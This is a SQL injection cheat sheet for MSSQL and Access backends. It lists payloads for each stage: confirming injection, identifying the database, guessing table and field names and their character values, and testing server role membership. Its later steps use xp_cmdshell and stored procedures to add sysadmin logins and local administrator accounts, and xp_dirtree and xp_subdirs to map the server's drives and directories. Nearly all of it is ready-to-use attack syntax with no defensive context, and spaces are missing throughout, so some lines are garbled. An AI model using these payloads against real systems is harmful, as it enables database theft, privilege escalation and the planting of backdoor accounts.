1. Determine whether injection is possible; and1=1; and1=2
2. Preliminary check of whether the backend is mssql;anduser>0
3. When the injected parameter is a string: 'and[query condition] and''='
4. When the parameter is filtered during a search: 'and[query condition] and'%25'='
5. Identify the database system
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6. Guess the database; and(selectCount(*) from [database name])>0
7. Guess the field; and(selectCount(field name) from database name)>0
8. Guess the record length in the field; and(selecttop1len(field name) from database name)>0
9.(1) Guess the ascii value of the field (access)
;and(selecttop1asc(mid(field name, 1, 1)) from database name)>0
(2) Guess the ascii value of the field (mssql)
;and(selecttop1unicode(substring(field name, 1, 1)) from database name)>0
10. Test the privilege level (mssql)
;and1=(selectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(selectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(selectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(selectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(selectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(selectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(selectIS_MEMBER('db_owner'));--
11. Add an mssql account and a system account
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;-
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword
/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
12. (1) List the directory
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:/'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin('paths obtained from the previous step'))>)
(2) Traverse the directory
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));-
;inserttempexecmaster.dbo.xp_availablemedia;-get all current drives
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:/';--Get subdirectory list
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:/';--Get the directory tree structure of all subdirectories